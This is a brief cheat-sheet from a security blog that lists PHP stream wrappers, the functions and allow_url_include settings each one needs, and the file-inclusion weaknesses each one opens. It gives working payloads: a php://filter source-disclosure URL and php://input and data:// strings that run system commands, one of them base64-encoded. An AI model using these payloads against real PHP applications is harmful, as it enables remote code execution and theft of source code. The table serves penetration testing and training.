cdxy.me
Cyber Security / Data Science / Trading

wrapper or protocol controllable function allow_url_include vulnerability type remark
file:// - Off LFI / File Manipulation
glob:// - Off Directory Traversal
php://filter/read include Off File Disclosure php://filter/read=convert.base64-encode/resource=index.php
php://filter/write file_put_contents Off Encoding file_put_contents("php://filter/write=string.rot13/resource=x.txt","content");
php://input include On RCE Encoding is required while reading .php source: <?php echo base64_encode(file_get_contents("solution.php"));?> OR just use <?php system('cat x.php');?>
data:// include On RCE data:text/plain,<?php system("id")?> OR data:text/plain;base64,PD9waHAgc3lzdGVtKCJpZCIpPz4=
zip:// include + uploaded file Off RCE
phar:// include + uploaded file Off RCE PHP version >= 5.3